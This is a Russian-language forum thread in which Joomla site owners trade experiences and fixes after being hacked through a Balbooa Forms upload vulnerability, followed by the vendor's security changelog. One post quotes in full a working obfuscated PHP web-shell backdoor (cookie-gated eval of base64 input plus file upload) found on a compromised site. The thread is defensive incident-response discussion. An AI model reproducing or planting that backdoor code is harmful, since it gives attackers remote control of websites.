Компонент Balbooa Forms

может есть новая версия 2.4.2 (от 16 июля 2026 года)? В версии 2.4.0 была найдена серьезная уязвимость CVE-2026-56291 (Для просмотра ссылки Войди или Зарегистрируйся). Уже пару раз пришлось сайт восстанавливать, пока разобрался в чем дело и заблокировал запись в определенную папку
 
Последнее редактирование:
может есть новая версия 2.4.2 (от 16 июля 2026 года)? В версии 2.4.0 была найдена серьезная уязвимость CVE-2026-56291 (Для просмотра ссылки Войди или Зарегистрируйся). Уже пару раз пришлось сайт восстанавливать, пока разобрался в чем дело и заблокировал запись в определенную папку
присоединяюсь к поиску актуальной версии. Подскажите пожалуйста как вы заблокировали запись в определенную папку? Что требуется сделать
 
присоединяюсь к поиску актуальной версии. Подскажите пожалуйста как вы заблокировали запись в определенную папку? Что требуется сделать
заблокировал запись в папку images/baforms/uploads/, то есть задал права на папку 444, сделать доступной только для чтения, конечно прежде удалил оттуда все, но пришлось поудалять еще троянов, да восстановить, то что удалили и поломали, в целом делов на полчаса, дольше всего сканирование антивирусником шло. Оставил пока так, пока не появится возможность обновить компонент. После этого уже пару недель как ничего не ломается и не добавляется
 
Последнее редактирование:
Присоединяюсь, поломали пару сайтов на разных хостингах. Школоло блин...... Оставили файлы с текстом "hacked by coupdegrace" и рассылали спам через скрипты. Возможно слили базы и файлы, но это не точно.... Посмотрел, есть конторы, которые по запросу "hacked by coupdegrace что это" - предлагают услугу очистки от вируса. Думаю это они и есть, сами проблему создали, сами её решили, цена вопроса на их сайте 10 тыс рубликов :))) хрен им... Пока заморозил сайты, изучаю изменения в файлах ,один сайт уже запустил. Самый простой вариант - отбекапится до даты первой "нулевого дня это ошибки". На месте разработчиков я бы позаботился о клиентах, фикс безопасности могли бы бесплатно сделать.

Кого взломали ищите файлики: router.phtml и scarworld.phtml - через них полный доступ к файлам сайта эти школоло имеют. У меня эти файлики лежали тут: адрес_сайта/public_html/templates/gridbox - прямо в этой папочке. И если зайти по этому пути с браузера, у нас открывается интерфейс с доступом :) так же залезли в раздел "пользователи" в админке Джумла - имейте ввиду, удалите лишних, включите двухфакторную авторизацию.!!!

заблокировал запись в папку images/baforms/uploads/, то есть задал права на папку 444, сделать доступной только для чтения, конечно прежде удалил оттуда все, но пришлось поудалять еще троянов, да восстановить, то что удалили и поломали, в целом делов на полчаса, дольше всего сканирование антивирусником шло. Оставил пока так, пока не появится возможность обновить компонент. После этого уже пару недель как ничего не ломается и не добавляется
Есть вариант, что этим не отделаться. Начал находить после этой же процедуры файлы в корне сайта. Которые содержат признаки HEUR:Backdoor.PHP.WebShell.gen - начали создавать пользователей в админке, то есть у них есть доступ к базе несмотря на то, что я включил двухфакторную авторизацию....пока не понимаю как это работает.

Резюмирую, в общем нифига не победил пока что... Продолжают создавать пользователей. Менял доступ к БД - менял пароль в админку, делал двуфакторную аутификацию, пока ничего не спасает. Ищу где инъекцию сделали...Хостер отмалчивается.

Ребята дополню, похоже дело не только в формах, но Screenshot_304.jpgи в Гридбоксе!! Приложил скрин. Нашел в базе имя файла который сгенерился с свредоновом. Пок не понял откуда ноги растут....

Вот еще скрин.Screenshot_305.jpg

Содержимое файла такое : <?php //echo 409723*20;if(md5($_COOKIE["d"])=="\61\x37\60\62\x38\146\x34\70\67\143\142\x32\141\70\x34\x36\x30\67\x36\64\x36\x64\141\63\141\144\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\x5f\x6e\x61\x6d\x65"],$_FILES["\146\x69\154\x65"]["\156\141\155\x65"]);}}?>
- то есть я так понял открывая страницу пользоавтель запускал пхп файл.
 
Последнее редактирование:
У меня хостер проверил и выявил вредоносный код в папках /www/мой сайт.ru/images/baforms/uploads/form-1. Удалил всё содержимое папок form. Переустановил пока доступную 2.4.0 и установил на uploads права 444. Завтра посмотрю базу....
 
У меня хостер проверил и выявил вредоносный код в папках /www/мой сайт.ru/images/baforms/uploads/form-1. Удалил всё содержимое папок form. Переустановил пока доступную 2.4.0 и установил на uploads права 444. Завтра посмотрю базу....
метод может кому то и поможет, мне не помог, у меня Joomla 4.4.13 и я тоже ставил 2.4.0 пофиксили в 2.4.3 Для просмотра ссылки Войди или Зарегистрируйся - так что удалите лучше ,ну или если хотите как я через боль и страдания получить опыт - то это ваш выбор :)))

может есть новая версия 2.4.2 (от 16 июля 2026 года)? В версии 2.4.0 была найдена серьезная уязвимость CVE-2026-56291 (Для просмотра ссылки Войди или Зарегистрируйся). Уже пару раз пришлось сайт восстанавливать, пока разобрался в чем дело и заблокировал запись в определенную папку
Присоединяюсь к просьбе. Возможно защита директории images/baforms/uploads/ от записи (для временной закачки) поможет, но хотелось бы более надежного прикрытия..
 
Последнее редактирование:
Присоединяюсь к просьбе. Возможно защита директории images/baforms/uploads/ от записи (для временной закачки) поможет, но хотелось бы более надежного прикрытия..
Как вариант, посмотреть в сторону свежего RSFirewall! Version 3.3.15
  • Added - Protection against Balbooa Forms < 2.4.3 vulnerability.
  • Added - Protection against SP Page Builder < 6.7.1 vulnerability.
  • Updated - Improved protections.
 
Как вариант, посмотреть в сторону свежего RSFirewall! Version 3.3.15
  • Added - Protection against Balbooa Forms < 2.4.3 vulnerability.
  • Added - Protection against SP Page Builder < 6.7.1 vulnerability.
  • Updated - Improved protections.
Спасибо за информацию, на начальной стадии атак я пользовался Akeeba Admin Tools - конкретно был инструмент мониторинга изменения файлов. когда я увидел что изменено 73 файла и добавлено еще сколько-то, я понял что сносить надо к чертям всё))))) Так и сделал, прописал в htaccess запрет на обращение к уязвимой части Gridbox (известной) и запретил доступ к папке images/baforms/uploads/ - пока что по сей день тишина, попробую посмотреть RSFirewall - надеюсь в нём самом нет дыр, эра ИИ наступила "внезапно" как зима для комунальщиков..
 

Balbooa Forms Pro 2.4.3.1




2.4.3.1 — 31.07.2026​

Added
  • Strengthened authorization and validation for sensitive file operations.
  • Improved security controls and validation for file uploads
  • Added additional authorization checks for protected application actions
  • Enhanced server-side validation of user input across multiple request handlers
  • Implemented additional security safeguards to improve overall application security

2.4.3 — 28.07.2026​

Security Update

This release addresses a critical security vulnerability affecting the Signature field in previous Forms versions.

CVE: CVE-2026-65880

Security Fixes:
  • Fixed improper handling of user-supplied data when processing Signature field submissions by enforcing an explicit server-side decoding method and strengthening validation of structured form input.

Affected Versions: 2.4.2.1 and earlier

Action Required:
  • Update all installations running versions earlier than BA Forms 2.4.3.
  • Enable CAPTCHA protection on publicly accessible forms to help reduce automated attacks.
  • Review your website files for any unexpected or suspicious PHP files.

2.4.2.1 — 24.07.2026​

Fixed
  • Form submission issue when HTML, CSS, and JavaScript minification was enabled.

2.4.2 — 16.07.2026​

Added
  • Signature Storage Path option
  • Signature files now receive randomly generated server-side filenames
  • Generated submission PDF files now receive randomly generated server-side filenames
Fixed
  • Form submission issue when Joomla caching was enabled

2.4.1 — 09.07.2026​

Security Update

This release addresses a security vulnerability affecting previous Forms versions

CVE: CVE-2026-56291

Security Fixes:
  • Added server-side validation of allowed file extensions for frontend uploads based on the field configuration
  • For the Upload File field, a new MIME Types option has been added to improve upload security
  • Uploaded files now receive randomly generated server-side filenames instead of preserving client filenames
  • Added CSRF protection to frontend file upload requests

Affected Versions: 2.4.0 and earlier

Action Required:
  • Update to Forms 2.4.1 immediately
  • Review the images/baforms/uploads/ directory, including all subdirectories, and remove any unexpected PHP files, as uploaded content directories should not contain executable PHP files
 
Назад
Сверху